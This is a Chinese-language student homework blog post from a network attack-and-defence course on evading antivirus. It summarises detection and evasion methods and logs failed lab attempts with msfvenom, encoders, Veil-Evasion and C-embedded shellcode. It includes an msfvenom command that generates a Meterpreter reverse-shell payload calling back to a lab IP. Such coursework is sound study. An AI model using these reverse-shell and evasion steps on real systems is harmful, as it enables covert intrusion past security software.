《网络攻防》第十四周作业-免杀

1 基础问题回答

1.1 杀软是如何检测出恶意代码的?

  1. 特征码:亡羊补牢的方式,根据现有的病毒的特征码进行匹配。
  2. 启发式:看着你干的事情像是恶意软件会做的
  3. 基于行为:根据软件的异常行为

1.2 免杀是做什么?

使恶意程序不被安全软件发现。

1.3 免杀的基本方法有哪些?

  1. 改变特征码。
  2. 改变行为。
  3. 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
  4. 使用社工类攻击,诱骗目标关闭AV软件。
  5. 纯手工打造一个恶意软件。

2 实验总结与体会

按照教程一步步来,结果都不能免杀。免杀还是挺难的。如果360已经使用基于行为的查杀模式,那么对该实验中的shellcode再怎么加密加壳也是徒劳的,需要在其他方面多下功夫想办法。

3 离实战还缺些什么技术或步骤?

对操作系统的安全防护体系和杀软的工作模式了解还不够,只能按照教程来,就算有一点自己的想法,也不知道该如何去实现。此外,就算做好了免杀,将该恶意程序放入目标主机的过程才是更加困难的。

4 实践过程记录

2.1 msfvenom直接生成meterpreter

如图,

免杀效果测试

2.2 msfvenom使用编码器

如图,

免杀效果并不理想

2.3 使用veil-evasion

需要自行安装,安装过程较慢,使用方法和msf很像。如图,

还是不能免杀,直接最后一种方法吧。

2.4 C语言调用Shellcode

使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.186.132 LPORT=1692 -f c得到shellcode并放到c文件中,如图

用到很多windows特有的头文件,linux gcc无法编译,我使用的是vc6.0,但是缺少stdafx.h文件,我自己下载了一个。结果刚编译好就被360删了。

5 遇到的问题与解决过程

编译c程序的问题,装vs太慢太复杂,用了现成的vc6,通过自己下载头文件解决头文件缺失问题。

posted @ 2017-06-03 22:07  yp1692  阅读(225)  评论(1编辑  收藏  举报